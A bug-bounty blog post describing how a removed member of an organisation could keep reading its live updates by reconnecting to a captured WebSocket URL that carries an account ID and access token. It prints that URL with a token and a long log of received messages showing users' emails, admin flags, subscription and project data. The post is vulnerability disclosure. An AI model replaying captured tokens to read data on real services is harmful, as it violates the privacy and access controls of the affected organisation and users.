Hunting Websockets For Fun And Profit


It’s been a while since we have came up with any blogpost. 
So this post will be about how i grabbed every information that was being updated over my organization even after i was removed from the organization.
First let’s start with what is WebSockets?
A good explanation can be found here https://pusher.com/websockets
Lets start, As the program is private i cannot share it so i’ll be naming it as victim.com and subdomain of the organization as abc.victim.com.
So while doing my normal testing i noticed that while changing any info on abc.victim.com a request is made to WebSockets with the details of the like for example in my case:
https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

 Response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

Apparently after watching the response i though what would happen if the user is removed from the organization would he still able to fetch the data from the organization.
Now the question was what and what not can be extracted from the WebSockets?
The first thing i noticed that the user after getting kicked from the organization is still able to extract/grab every details of changes happening in the organization by connecting to the WebSocket request which we captured earlier.
Example of the response after the user was removed from the organization.
RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract details the user email, project details , customer details and contacts 
The good thing i noticed was that i was able to extract those details even when i was on view only permission.
Thanks For Reading.
Cheers
Bugdiscloseguys

2 thoughts on “Hunting Websockets For Fun And Profit”

  1. Can you please explain one thing, when you delete the user id param. then “What exactly info you got, I mean that whole bunch of data?

    Thank you,

Leave a Reply

Your email address will not be published. Required fields are marked *